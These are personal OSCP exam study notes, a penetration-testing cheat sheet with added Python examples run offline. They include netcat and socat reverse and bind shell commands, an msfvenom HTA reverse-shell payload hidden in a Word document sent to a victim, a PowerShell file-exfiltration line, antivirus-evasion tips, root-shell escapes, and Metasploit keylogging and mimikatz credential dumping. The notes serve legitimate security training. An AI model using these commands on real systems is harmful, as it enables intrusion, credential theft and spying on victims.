#Mohamed Mehanna
OSCP Notes:
********* Practical tools *************
1-Netcat:
- nc -nv ip_address port # check whether you can reach a TCP port (add -u for UDP)
- rdesktop IP_Address -u user -p password # connect to a remote Windows target over RDP
ex: rdesktop 193.227.34.143 -u mrtrojan -p 4019
- nc -nvlp 4444 # listen and wait to receive a connection on that port
nc -nv ip_address 4444 # connect to that open port from the other machine
-Bind shell (the target listens, you connect):
nc -nvlp 4444 -e cmd.exe # a windows machine waits for a connection on port 4444 and hands cmd.exe to whoever connects
nc -nv IPaddress 4444 # type this on the linux machine: the cmd of the windows machine opens for you and you can execute commands
nc -nvlp 4444 -e /bin/bash # the same on a linux target: it waits to receive a connection and serves /bin/bash
nc -nv ip_address 4444 # connect from your machine and execute commands
-Reverse shell (you listen, the target connects back): nc -nvlp 4444 on your machine, then nc -nv your_ip 4444 -e /bin/bash on the target
*note: -e exists only in nc.traditional and ncat; the OpenBSD netcat shipped by many distributions does not have it
2- SOCAT
socat - TCP4-LISTEN:443 # listen on 443 and tie the connection to your terminal (stdio)
socat - TCP4:ip_address:port_number # connect to a listening port from the other side
---Transfer files by socat ----
-sudo socat TCP4-LISTEN:443,fork file:password.txt # on the machine that has the file (fork lets more than one client fetch it)
-socat TCP4:192.168.0.194:443 file:password.txt,create # on the receiving machine: creates password.txt from the stream
------reverse shell of socat --------
-socat TCP4-LISTEN:443 STDOUT # on the attacker: receive the connection
-socat TCP4:attacker_ip:443 EXEC:/bin/bash # on the target: connect back to the attacker and hand it a bash shell (EXEC runs on the machine that types this command)
-------- socat encrypted bind shell-----
-openssl req -newkey rsa:2048 -nodes -keyout bindshell.key -x509 -days 362 -out bindshell.crt # self-signed certificate
-cat bindshell.key bindshell.crt > bindshell.pem # socat wants key and cert in one pem file
-sudo socat OPENSSL-LISTEN:443,cert=bindshell.pem,verify=0,fork EXEC:/bin/bash # on the target: TLS bind shell
-socat - OPENSSL:ipaddress:443,verify=0 # on the attacker: connect to it (verify=0 because the cert is self-signed)
-----------------------------------------
-Passive information Gathering
1-whois domain_name ex: whois google.com # registrant, registrar and name servers of the domain
whois ip_address ex: whois 193.227.34.143 # owner and netblock of the address
2-Google Hacking
site:target.com filetype:php # restrict results to one site and one file type; prefix a term with - to exclude it, ex: site:target.com -filetype:html
use these dorks to find files on the target that may be sensitive (backups, configs, directory listings)
3-netcraft
https://searchdns.netcraft.com # subdomains, hosting and technology info about the domain
4-recon-ng # modular recon framework (marketplace of modules for subdomains, contacts, etc)
5-open source code : you can use github to gather information about a company, ex:
https://www.github.com/google
https://www.github.com/yahoo
# look in the repos for leaked credentials, internal hostnames and config files
6-shodan # search engine for devices connected to the internet (banners, open ports)
7-checking the security headers with https://securityheaders.com/ : type the domain of the target and the site reports which HTTP response headers (CSP, HSTS, X-Frame-Options, ...) are set; these headers mitigate attacks such as xss and clickjacking, so missing ones hint at the security posture
8-ssl server test : use https://www.ssllabs.com/ssltest/ to test the ssl/tls configuration of the website (protocol versions, ciphers, certificate)
9-Pastebin : search pastebin for the target (leaked credentials and dumps)
10-theHarvester : collects email addresses (and hosts) from public sources, ex:
theHarvester -d domain_name -b google
11-emailharvester -d yahoo.com # also collects email addresses for the domain (target)
12-https://www.social-searcher.com # collects posts and comments about an organization or target on social media
13-https://digi.ninja/projects/twofi.php # twofi builds a wordlist from a target's Twitter feed, for password attacks
14-https://github.com/initstring/linkedin2username : you log in with your own valid LinkedIn account and it generates lists of possible username formats for all employees of the company you point it at
15-stackoverflow : developers discuss programming problems there; the people answering may be employees of the organization, and if employees post snippets containing sensitive data you learn about internal systems and unpatched vulnerabilities
16-https://osintframework.com/ # index of osint tools by category
17-maltego : a great tool for osint and link analysis
---------------------------------------------
-Active information gathering
-Dns enumeration : extract the ip address of a domain => ex: host yahoo.com
extract the mail servers => host -t mx yahoo.com
extract the name servers => host -t ns domain_name ex: host -t ns yahoo.com
-dnsenum domain_name ex: dnsenum yahoo.com => enumerate the domain (name servers, mx, zone transfer attempt, subdomain brute force)
-TCP/UDP scanning with netcat
TCP scanning : nc -nvv -w 1 -z ip_address port_range ex: nc -nvv -w 1 -z 192.168.1.15 288-300
UDP scanning : nc -nv -u -w 1 -z ip_address port_range ex: nc -nv -u -w 1 -z 192.168.1.9 port_range
(-z = scan only, send no data; -w 1 = one second timeout; udp results are unreliable because a closed udp port may just stay silent)
- sudo nmap -sn 192.168.1.0/24 => ping sweep to find the live hosts on the network (-Pn does the opposite: it skips host discovery and scans every address as if it were up)
- sudo nmap -O ip_address => OS fingerprinting of the target ex : sudo nmap -O 192.168.1.6
-sudo nmap -sV ip_address => banner grabbing / version detection of the services running on the target
-sudo nmap -sV -sC ip_address => version detection plus the default nmap scripts
-sudo masscan -p80 --rate=100 ip_address => very fast port scanner ex: sudo masscan -p80 --rate=100 192.168.0.1
masscan : asynchronous port scanner with its own tcp/ip stack, so when scanning a whole range it needs the interface and the gateway:
sudo masscan -p80 ip_address/24 --rate=100 -e interface --router-ip gateway_ip ex: sudo masscan -p12 98.138.11.157/24 --rate=100 -e wlp9s0 --router-ip 192.168.0.1
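The `nc -z` / nmap connect scan logic above, as an added example that is not part of the original notes: a TCP connect scanner in Python, demonstrated against a listener it opens itself on 127.0.0.1 so it runs offline. A completed handshake means open, a refused connection means closed, and silence until the timeout means filtered, which is exactly how `nc -nvv -w 1 -z` classifies ports. The demo ports are whatever the OS hands out at run time.

```python
import socket
from concurrent.futures import ThreadPoolExecutor


def probe(host, port, timeout=1.0):
    """One connect() attempt, the same thing `nc -z` does for each port.
    'open' = handshake completed, 'closed' = refused (RST), 'filtered' = no answer."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"
    except ConnectionRefusedError:
        return "closed"
    except (socket.timeout, OSError):
        return "filtered"
    finally:
        s.close()


def connect_scan(host, ports, timeout=1.0, workers=32):
    """Probe every port in `ports` in parallel; returns {port: state}."""
    ports = list(ports)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        states = list(pool.map(lambda p: probe(host, p, timeout), ports))
    return dict(zip(ports, states))


def open_ports(host, ports, timeout=1.0):
    """Just the open ones, sorted, like the lines nc -z reports as open."""
    return sorted(p for p, st in connect_scan(host, ports, timeout).items() if st == "open")


def demo():
    """Offline demo: open one listener on a free port, release another free port,
    then scan both. Returns the ports used and the scan result."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    open_port = listener.getsockname()[1]
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind(("127.0.0.1", 0))
    closed_port = tmp.getsockname()[1]
    tmp.close()  # nothing listens here now, so connect() is refused
    try:
        scan = connect_scan("127.0.0.1", [open_port, closed_port])
        found = open_ports("127.0.0.1", range(open_port - 1, open_port + 2))
    finally:
        listener.close()
    return {"open_port": open_port, "closed_port": closed_port, "scan": scan, "found": found}


if __name__ == "__main__":
    print(demo())
```

A connect scan completes the handshake, so it shows up in the target's service logs; nmap's default `-sS` SYN scan never finishes the handshake, which is quieter but needs raw sockets (root). Lower `workers` against fragile targets.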
smb: protocol used to share files between computers
-Netbios : a network service that lets applications on different computers communicate across a local area network (LAN)
-sudo nbtscan -r ip_range => search for netbios names on the network ex: sudo nbtscan -r 192.168.1.0/24
-sudo smbclient -L ip_address => list the shares of the smb service ex : sudo smbclient -L 192.168.1.19
-sudo smbmap -H ip_address => list the smb shares and your permissions on them ex : sudo smbmap -H 192.168.1.19
smb and netbios use ports 139 and 445
you can scan them with nmap : nmap -sV -p 139,445 ip_address (the smb nse scripts live in /usr/share/nmap/scripts/smb*)
-NFS : lets a client access files over the network as if they were local
rpcinfo -p ip_address # list the services registered with rpcbind on the target
showmount -e ip_address => list the nfs exports of the target
snmp protocol : application layer protocol over UDP used to manage routers, hubs, and switches on an IP network
-Snmp : scan it with nmap => sudo nmap -sU -p 161 ip_address (udp, so -sU is required)
------------------------------------------------------------------
-Buffer Over flow (BOF):
Architecture fundamentals
-number systems
1-Binary => 0,1
2-Octal => 0,1,2,3,4,5,6,7
3-Decimal => 0,1,2,3,4,5,6,7,8,9
4-Hexadecimal => 0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F
-RAM / byte order
the bytes of a multi-byte value are stored in one of two orders:
1-Big-endian => most significant byte first (network byte order)
2-Little-endian => least significant byte first (x86/x64); the address 0x080414c3 sits in memory as c3 14 04 08 and must be written into an overflow payload in that order
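Byte order in practice, as an added example that is not part of the original notes: packing an address the way an x86 buffer overflow payload needs it, and what goes wrong when the order is mixed up. It goes one step past the fundamentals above by showing the generic overflow layout (filler, return address, NOP sled, shellcode). `EXAMPLE_ADDR`, the offset and the shellcode byte are constructed values, not from any real target.

```python
import struct

# Constructed address for illustration only (shaped like an x86 text-segment address).
EXAMPLE_ADDR = 0x080414C3


def pack_address(addr, order="little", width=4):
    """Encode addr as `width` bytes; x86/x64 want 'little', network protocols 'big'."""
    fmt = {"little": "<", "big": ">"}[order] + {4: "I", 8: "Q"}[width]
    return struct.pack(fmt, addr)


def unpack_address(raw, order="little"):
    """Decode bytes back to an integer; decoding with the wrong order gives a wrong address."""
    fmt = {"little": "<", "big": ">"}[order] + {4: "I", 8: "Q"}[len(raw)]
    return struct.unpack(fmt, raw)[0]


def hexdump(raw):
    """Bytes as a debugger shows them, in memory order."""
    return " ".join(f"{b:02x}" for b in raw)


def build_overflow(offset, ret_addr, shellcode=b"", nop_sled=16, width=4):
    """Generic stack overflow layout (assumed inputs, not a specific exploit):
    filler up to the saved return address, the address in little-endian,
    a NOP sled, then the shellcode."""
    return b"A" * offset + pack_address(ret_addr, "little", width) + b"\x90" * nop_sled + shellcode


if __name__ == "__main__":
    le = pack_address(EXAMPLE_ADDR)
    print("little-endian in memory:", hexdump(le))
    print("read back correctly:    ", hex(unpack_address(le)))
    print("read back as big-endian:", hex(unpack_address(le, "big")))
    print("payload:", build_overflow(8, EXAMPLE_ADDR, b"\xcc", nop_sled=4))
```

If the debugger shows `c3 14 04 08` where you expected `08 04 14 c3`, nothing is wrong: that is the little-endian encoding of the same address. The mistake to avoid is typing the address into the payload as ASCII hex or in big-endian order, which sends execution to `0xc3140408` instead.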
-----------------------------------------------------------------
-client side attack :
client side attack means the attacker sends the victim a malicious application or url and the victim's own software (browser, office) runs it
how to perform that :
1-install microsoft office , specifically microsoft word
2-create the payload with msfvenom => msfvenom -p windows/shell_reverse_tcp LHOST=your_ip_address LPORT=any_port -f hta-psh -o /home/evil.hta
- there are two ways to deliver the payload to the victim
1-copy the powershell one-liner out of the malicious file (evil.hta) into a file with the extension (bat) ex : evil.bat , then open microsoft word => insert => object => select the file (evil.bat) and send the word file to the victim
-then open netcat with : nc -nvlp 4444 (the port you selected in the payload) and wait for the victim to open the document and double-click the object
2-the other way is to send the victim a link to the hta file; when they download and open it you get the reverse connection on the netcat listener you already started
---------------------------
-Search exploits
the most popular websites
1-Exploit-DB (or its feed Exploit-DB/rss.xml)
2-securityfocus.com
3-packetstorm
4-Google Dorking
-you can search offline for exploits as follows =>
1-searchsploit (service or vulnerability name) ex: searchsploit ftp (searchsploit -m id copies the exploit into the current directory)
2-you can use nmap scripts, they live in /usr/share/nmap/scripts
-sudo nmap --script=(the vuln script) ip_address => run that script against the target, ex: nmap --script=vuln ip_address
3-metasploit => msfconsole # to run metasploit
msf6> search (vulnerability_name) ex: search ssh
------------------------------------------
-Shell upgrade and file transfer
-once you get a shell (rce) on the target , upgrade it to a fully interactive tty (tab completion, arrow keys, ctrl+c no longer kills the shell) with these steps:
1- python -c 'import pty; pty.spawn("/bin/bash")'
2-ctrl+z => background the shell on your attacker machine
3-stty raw -echo; fg => on the attacker machine, then press enter (stty raw -echo is typed in your own terminal, not in the remote shell)
4-export TERM=xterm => optional, so clear and other curses tools work
*note: this is a nicer shell, not persistence; if the connection drops you need to exploit again
-to upload a file from the attacker machine to the victim machine:
1-simple http server
-Attacker machine => python3 -m http.server 80 (python 2: python -m SimpleHTTPServer 80)
-victim machine => wget http://192.168.1.9/pass.txt
-if the victim is windows and you only have a text shell (no wget/curl), transfer the file as hex :
1- exe2hex -x file_name -p nc.cmd (ex: exe2hex -x /usr/share/windows-resources/binaries/nc.exe -p nc.cmd)
2-copy the contents of nc.cmd and paste it into the shell of the victim; it echoes the hex into a file and rebuilds the binary with powershell
-now the file is on the victim
-how to download files from the victim to the attacker
=> powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.1.9/uploads', 'C:\path\to\the\file')
(the attacker side needs a web server with a script that accepts the POST and stores the file)
https://ironhackers.es/en/cheatsheet/transferir-archivos-post-explotacion-cheatsheet/
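The idea behind exe2hex, as an added example that is not part of the original notes or of exe2hex itself: a binary is turned into lines of hex short enough to paste into a text-only shell, and rebuilt on the other side. The rebuild script here uses `certutil -decodehex` (assumed available on the Windows target; exe2hex -p uses powershell instead), and `SAMPLE_BINARY` is constructed data standing in for nc.exe.

```python
import binascii
import hashlib


def to_hex_lines(data, width=64):
    """Hex-encode data and cut it into lines of at most `width` hex characters,
    short enough to paste into a shell without the line being truncated."""
    h = binascii.hexlify(data).decode()
    return [h[i:i + width] for i in range(0, len(h), width)]


def from_hex_lines(lines):
    """Rebuild the bytes from pasted lines; blank lines and surrounding whitespace are ignored."""
    cleaned = "".join(l.strip() for l in lines if l.strip())
    return binascii.unhexlify(cleaned)


def to_cmd_script(data, name, width=64):
    """Windows cmd.exe script that recreates `name` from hex with certutil.
    Each echo appends one hex line; certutil -decodehex accepts a file of plain hex text."""
    hex_name = name + ".hex"
    lines = [f"if exist {hex_name} del {hex_name}"]
    lines += [f"echo {chunk}>>{hex_name}" for chunk in to_hex_lines(data, width)]
    lines.append(f"certutil -decodehex {hex_name} {name}")
    return "\r\n".join(lines)


def sha256(data):
    """Compare with `certutil -hashfile <file> SHA256` on the target after the rebuild."""
    return hashlib.sha256(data).hexdigest()


# Constructed sample standing in for nc.exe: every byte value, including nulls.
SAMPLE_BINARY = bytes(range(256)) * 3


if __name__ == "__main__":
    script = to_cmd_script(SAMPLE_BINARY, "nc.exe")
    print(script.splitlines()[0])
    print(script.splitlines()[1][:40], "...")
    print(script.splitlines()[-1])
    print("expected sha256:", sha256(SAMPLE_BINARY))
```

Always hash both copies after a paste transfer: a single dropped or wrapped line corrupts the binary silently, and `from_hex_lines` raising on an odd number of hex digits is the only error you get for free.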
----------------------------------
Antivirus Evasion
-bypassing antivirus detection
1-ON-DISK evasion (change what the file on disk looks like)
-packers
-obfuscators
-crypters
-software protectors
2-in-memory evasion (never write the payload to disk, ex: inject it from powershell)
- you can create payloads with thefatrat or msfvenom (encoders, custom templates); these tools help evade the antivirus, but always test the result against the same AV product the target runs before using it
===================================================
-Privilege Escalation
types of privilege escalation:
1-horizontal (another user at the same level)
2-vertical (a higher level, ex: admin/root)
-how can i escalate the privilege ?
1-Information gathering
(1)-manual enumeration of users
windows :
whoami => the current user (whoami /priv shows its privileges)
net user => the local user accounts on the system
net user (the name of the user) ex: net user mrtrojan => more details about that user (groups, last logon)
Linux:
whoami => the current user (id also shows its groups)
cat /etc/passwd => all users on the system
(2)enumerating the hostname
windows :
hostname => the name often reveals the role of the machine (webserver, database or domain controller)
-systeminfo => os version, installed hotfixes, domain
Linux :
hostname => same idea, the name hints at the role (webserver, database or domain controller)
uname -a => kernel version and architecture
cat /etc/issue => the distribution and version of the os
(3)enumerating the running processes and services
windows :
tasklist /svc => all running processes and the services they host
Linux :
ps aux => all running processes (look at the USER column for things running as root)
2-Enumerating the Network Information
-you need to enumerate the internal open ports: services bound to localhost or to the internal network can only be reached from the target you hacked
Windows :
netstat -ano => all open ports and the pid of the process behind each
Linux :
ss -anp => all open ports and the process behind each
3-Enumerate the firewall status and rules
windows :
netsh advfirewall show currentprofile => display the information about the firewall
netsh advfirewall show rule name=all
linux:
iptables -L (needs root; if you cannot run it, look for saved rules under /etc/iptables/)
4-Enumerating scheduled tasks
Windows :
schtasks /query /fo LIST /v => list the scheduled tasks and who they run as
Linux :
ls -lah /etc/cron* => the system cron directories
cat /etc/crontab => the system crontab; if a job runs as root and you can write to the script it executes, that is a privilege escalation path
5-Enumerating installed applications and level of patches
Windows :
# these two commands display the installed applications and the installed hotfixes
wmic product get name,version,vendor
wmic qfe get Caption,Description,HotFixID,InstalledOn
Linux :
dpkg -l => the installed packages (debian based)
-Enumerating read/writable files/directories
*note: directories and files you can write to but that root uses may help in privilege escalation, we use that command
Linux
find / -writable -type d 2>/dev/null => all directories the current user can write to, starting from the root directory
(find / -perm -o+w -type f 2>/dev/null for world-writable files)
-Enumerate unmounted disks :
Windows:
mountvol => the volumes and their mount points
Linux :
mount => the mounted disks (cat /etc/fstab and lsblk to see disks that are not mounted)
-Enumerating drivers and kernel modules
Windows :
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', 'Paged Pool(bytes)', Path
Linux :
lsmod => all loaded kernel modules
modinfo (name of module) ex: modinfo wmi => all information about the specified module (its version, to search for an exploit)
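Two of the manual checks above as code, an added example that is not part of the original notes: it runs over constructed /etc/passwd and /etc/crontab samples (`PASSWD_SAMPLE`, `CRONTAB_SAMPLE`, both made up for this example). The first check finds accounts that can actually log in and any second UID 0 account, the second lists the scripts cron runs as root, which are the paths worth feeding to the `find -writable` check.

```python
import shlex

# Constructed sample; note the extra uid 0 account "backup".
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:0:34:backup:/var/backups:/bin/sh
mrtrojan:x:1000:1000:mrtrojan:/home/mrtrojan:/bin/bash
"""

# Constructed sample in /etc/crontab format (m h dom mon dow user command).
CRONTAB_SAMPLE = """\
# /etc/crontab: system-wide crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 *   * * *   root    /opt/backup/backup.sh > /dev/null 2>&1
0  2    * * *   www-data /usr/bin/python3 /var/www/cleanup.py
"""

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}


def login_accounts(passwd_text):
    """Return (uid0_accounts, interactive_accounts) from /etc/passwd text.
    More than one uid 0 entry is a classic backdoor sign."""
    uid0, interactive = [], []
    for line in passwd_text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _, uid, _, _, _, shell = line.split(":", 6)
        if uid == "0":
            uid0.append(name)
        if shell not in NOLOGIN_SHELLS:
            interactive.append(name)
    return uid0, interactive


def root_cron_jobs(crontab_text):
    """Return [(schedule, user, command)] for /etc/crontab entries that run as root.
    Comment lines and VAR=value lines are skipped; the user field is the sixth column."""
    jobs = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        parts = line.split(None, 6)
        if len(parts) < 7:
            continue
        schedule, user, command = " ".join(parts[:5]), parts[5], parts[6]
        if user == "root":
            jobs.append((schedule, user, command))
    return jobs


def cron_script_paths(crontab_text):
    """Absolute paths referenced by root cron commands (minus /dev/*):
    the candidates to test with `find <path> -writable`."""
    paths = []
    for _, _, command in root_cron_jobs(crontab_text):
        for tok in shlex.split(command):
            if tok.startswith("/") and len(tok) > 1 and not tok.startswith("/dev/"):
                paths.append(tok)
    return paths


if __name__ == "__main__":
    print("uid 0 / interactive:", login_accounts(PASSWD_SAMPLE))
    print("root cron paths:", cron_script_paths(CRONTAB_SAMPLE))
```

On a real target replace the samples with `open("/etc/passwd").read()` and `open("/etc/crontab").read()`, and remember that /etc/cron.d/* uses the same seven-column format while user crontabs (crontab -l) have no user column.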
--------------------------------------------------------
Windows privilege escalation
-automated enumeration (winPEAS, PowerUp)
-tryhackme exercises
-------------------------------
Linux privilege escalation
-sudo vim -c ':!/bin/sh' => if sudo lets you run vim, spawn a root shell from it
-sudo nmap --interactive => then !sh gives a root shell; interactive mode only exists in old nmap (versions up to 5.x)
-check sudo -l for what you are allowed to run; https://gtfobins.github.io lists how each binary can be abused
-the most famous tools for linux privilege escalation are linPEAS and LinEnum
==============================LINUX PRIVILEGE ESCALATION================================
System Information
#OS info
-cat /proc/version || uname -a 2>/dev/null
-cat /etc/os-release 2>/dev/null # present on modern distributions
#PATH permissions
echo $PATH # look for directories in PATH that you can write to (a root process running a command by its bare name would pick up your binary)
#Environment info (passwords, api keys, other interesting info)
(env || set) 2>/dev/null
#Kernel exploits
cat /proc/version
uname -a
searchsploit "linux kernel"
-to search for kernel exploits you can use the tool => linux-exploit-suggester.sh
cat ~/.bash_history | grep -i passw => search the command history for passwords typed on the command line
cat /etc/passwd => display the users
cat /etc/shadow => display the password hashes (only readable as root; if you can read it, crack the hashes offline)
#sudo version
sudo --version # display the version of sudo
searchsploit "sudo version" ex: searchsploit sudo 1.9.5p
#AppArmor => mandatory access control that lets the administrator confine programs
if [ `which aa-status 2>/dev/null` ]; then
aa-status
elif [ `which apparmor_status 2>/dev/null` ]; then
apparmor_status
elif [ `ls -d /etc/apparmor* 2>/dev/null` ]; then
ls -d /etc/apparmor*
else
echo "Not found AppArmor"
fi
#Grsecurity: grsecurity is a set of patches for the Linux kernel which emphasize security enhancements. The patches are typically used by systems which accept remote connections from untrusted locations
(uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo "Not found grsecurity"
#PaX (the memory protection part of grsecurity)
(which paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo "Not found PaX")
#Execshield : aims at reducing the risk of worms and other automated remote attacks on Linux systems (non-executable stack/heap on old Red Hat kernels)
(grep "exec-shield" /etc/sysctl.conf || echo "Not found Execshield")
#SELinux: Security-Enhanced Linux is a Linux kernel security module that provides a mechanism for supporting access control security policies, including mandatory access controls.
(sestatus 2>/dev/null || echo "Not found sestatus")
#ASLR: Address space layout randomization is a computer security technique that makes exploitation of memory corruption vulnerabilities harder by randomizing where the stack, heap and libraries are mapped.
cat /proc/sys/kernel/randomize_va_space 2>/dev/null
#0 = disabled, 1 = stack and libraries randomized (conservative), 2 = full, including the heap; 2 is the default on modern kernels
note*******============== I stopped at Docker security (privilege escalation) in hacktricks ************=======
Port tunneling and redirection
read : hacktricks (port tunneling and redirecting)
-the attacker hacked a machine in a private network and discovers a server there with port 80 open. The attacker cannot reach port 80 of that server from his own machine, so he sets up a tunnel: the hacked machine (the pivot) connects to port 80 on the server and forwards the packets to the attacker machine, so in the end the attacker can access port 80 of the server
there are many scenarios :
1- Local port forwarding, with this command (run on the attacker machine) :
ssh -L local_port:target_ip:target_port user@pivot(hacked machine)
ex: sudo ssh -L 127.0.0.1:80:192.168.1.19:80 user@hacked_machine_ip => now whatever the attacker sends to 127.0.0.1:80 is carried through the ssh session to the pivot and from there to port 80 on 192.168.1.19
-You can use any port number greater than 1024 as the local port. Port numbers less than 1024 are privileged ports and can be used only by root, which is why the example above needs sudo
2-Remote port forwarding : traffic flows the other way, from the ssh server back to the ssh client. Run it on the hacked machine (the ssh client) pointing at your attacker machine (the ssh server) to expose an internal port on the attacker side :
ssh -R attacker_port:internal_host:internal_port user@attacker_host
3-Dynamic port forwarding : creates a socket on the local (ssh client) machine which acts as a SOCKS proxy. When a client connects to this port, the connection is forwarded through the ssh server to whatever destination host and port the client asked for, so one tunnel serves every internal host and port
ssh -D 8090 user@pivot => run this on the attacker machine (the ssh client), not on the remote machine
then open firefox => settings > network > manual proxy > socks host 127.0.0.1 > port 8090 (or use proxychains with socks4 127.0.0.1 8090 in its config)
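What `ssh -L` builds for you, as an added example that is not part of the original notes: a plain TCP relay on 127.0.0.1 that plays the role of the pivot. The internal service (port 80 on the server in the scenario above) is stood in for by a small echo server, the relay listens on a local port and copies bytes both ways, and a client talking to the relay is really talking to the target. Ports and the message are constructed at run time; nothing leaves the machine.

```python
import socket
import threading


def echo_server():
    """Stand-in for the internal service (the server's port 80 in the notes):
    answers one connection by echoing what it received. Returns its port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(b"target says: " + conn.recv(4096))
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def pump(src, dst):
    """Copy bytes src -> dst until src hits EOF, then pass the EOF on (half-close)."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def local_forward(target_host, target_port, listen_host="127.0.0.1", listen_port=0):
    """The relay that `ssh -L listen_port:target_host:target_port` sets up, minus the
    encrypted hop. Returns (listening socket, local port, stop event)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((listen_host, listen_port))
    srv.listen(5)
    srv.settimeout(0.2)  # so the accept loop can notice the stop event
    stop = threading.Event()

    def accept_loop():
        while not stop.is_set():
            try:
                client, _ = srv.accept()
            except socket.timeout:
                continue
            except OSError:
                return
            upstream = socket.create_connection((target_host, target_port))
            threading.Thread(target=pump, args=(client, upstream), daemon=True).start()
            threading.Thread(target=pump, args=(upstream, client), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()[1], stop


def demo(message=b"GET / HTTP/1.0\r\n"):
    """Client -> relay -> target and back; returns the target's reply as the client saw it."""
    target_port = echo_server()
    relay, local_port, stop = local_forward("127.0.0.1", target_port)
    try:
        with socket.create_connection(("127.0.0.1", local_port)) as c:
            c.sendall(message)
            c.shutdown(socket.SHUT_WR)
            reply = b""
            while True:
                chunk = c.recv(4096)
                if not chunk:
                    break
                reply += chunk
        return reply
    finally:
        stop.set()
        relay.close()


if __name__ == "__main__":
    print(demo())
```

The two `pump` threads are the whole trick: the relay never looks at the payload, so any TCP protocol goes through it, and the target only ever sees a connection from the pivot. With real `ssh -L` the client-to-pivot leg is inside the SSH session, and `-D` differs only in that the destination is read from the SOCKS handshake instead of being fixed.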
==================================== ACTIVE DIRECTORY ============================================================
-Domain Controller (DC):
A domain controller is a server that responds to security authentication requests within a domain. It authenticates users, stores account information and enforces the security policy for the domain, and it decides which hosts may access domain resources
-Active Directory : the directory service running on the domain controller (DC); users, computers, groups and policies live in it
-a great resource to gain a strong understanding of AD:
https://github.com/brianlam38/OSCP-2022/blob/main/cheatsheet-active-directory.md
====================================MetaSploit=====================================
*****services you need to run before running msf*****
-sudo systemctl start postgresql
-sudo systemctl enable postgresql
-sudo msfdb init => create and configure the database
-sudo apt install metasploit-framework => install/update metasploit (exploits and payloads)
-msfconsole => start the metasploit framework
- msf> help => show all commands
msf > workspace -a workspace_name ex : workspace -a hacker => create a workspace with its own hosts and scanned services
msf> search type:auxiliary name:smb => search for modules of one type by name
msf> info -d module_name ex: info -d auxiliary/dos/http/ws_dos => opens the module documentation in the browser and shows how to use it
- you can use https://shodan.io => to search for random targets
example : vuln:ms17_010 in shodan for targets vulnerable to eternalblue
or in metasploit : search ms17_010
-to run a post module automatically as soon as a session opens :
msf> set AutoRunScript post/windows/manage/migrate => migrates out of the exploited process before it dies
-inside meterpreter, transport add (with -t and -l/-p for the new transport) adds a fallback transport so the session stays alive if one protocol goes down
-after hacking a target these are important commands to run on the target machine (post exploitation), inside meterpreter:
meterpreter> getsystem => try to become SYSTEM
meterpreter> ps => the running processes
meterpreter> migrate process_id => move into another process, ex explorer.exe, which runs as the logged-in user; the keylogger needs that user's session, not SYSTEM
meterpreter> keyscan_start => start the keylogger (keyscan_dump to read what was typed)
meterpreter> load powershell => load the powershell extension and execute commands
meterpreter> load kiwi => load mimikatz (creds_all dumps credentials)
meterpreter> play /home/mrtrojan/hack.wav => play a waveform audio file (.wav) on the victim pc in the background (video files are not supported)
- you can write a resource script with the extension rc ex script.rc => and run it with metasploit by
msfconsole -r script.rc
#Finally I would like to thank you for reading my basic notes on this course, wish you all the best, hacker